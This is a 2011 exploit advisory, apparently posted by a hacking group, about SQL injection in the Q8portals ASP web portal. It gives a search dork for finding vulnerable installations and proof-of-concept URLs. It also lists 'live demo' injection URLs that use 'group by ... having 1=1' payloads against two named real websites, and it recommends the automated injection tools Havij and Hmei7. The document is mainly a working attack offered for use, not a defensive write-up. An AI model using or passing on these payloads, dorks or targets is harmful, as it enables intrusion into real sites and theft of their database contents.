========================================================================= Q8portals [asp] SQL Injection Vulnerability ========================================================================== [+]Title :.......Q8portals [asp] SQL Injection Vulnerability [+]Author :......Net.Edit0r [+]Tested on :...Win Xp Sp 2/3 [~]Data :.............2011-05-13 --------------------------------------------------------------------------- [~] Founded by Net.Edit0r [~] Team: Black Hat Group [~] Contact: Black.hat.tm@Gmail.Com [~] Home: http://Black-HG.Org & http://Security-War.Com [~] Vendor: http://www.Q8portals.com [~] Category:: [webapps] ==========ExPl0iT3d by Net.Edit0r========== [+] DORK: intext:Powered by: q8portals.com [+] Description: You start using the command having 1 = 1 - name of first table to find And more using the command (order by )other name you will find tables [ I ]. SQL Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [+++] Important: For Sql Injection easily program such Havij and use Hmei7 [P0C]: http://127.0.0.1/portal/articles_en.asp?id= [ SQL INJECTION] [P0C]: http://127.0.0.1/portal/contents_en.asp?id=4 [ SQL INJECTION] [L!v3 D3m0's]: http://www.alowaidhoney.com/portal/articles_en.asp?id=-4%20group+by+ARTICLES.ARTICLE_ID,ARTICLES.ARTICLE_TITLE_AR,ARTICLES.ARTICLE_DESC_AR+having%201=1-- http://alghanimkw.com/portal/contents_en.asp?id=4%20group+by+CONTENTS.CONTENT_ID,CONTENTS.CONTENT_NAME_AR,CONTENTS.CONTENT_DESC_AR-- [+] TIME TABLE: 12 May 2011 - Vulnerability discovered. 13 May 2011 - Advisory released. =========================================================================================== [!] Black Hat Group ./Iranian HackerZ =========================================================================================== [!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net =========================================================================================== [!] Greetz To : DarkCoder | p3nt3st3r | Amir-MaGiC | 3H34N | H3x | D3adlY & All Iranian HackerZ =========================================================================================== [!] Spec Th4nks: HUrr!c4nE | Virangar | B3hz4d | M4Hd1 | Mr.Xhat | Immortal Boy | __SENATOR__ | And All My Friendz =========================================================================================== [!] Persian Gulf 4 Ever I Love Iran And All Iranian People ===========================================================================================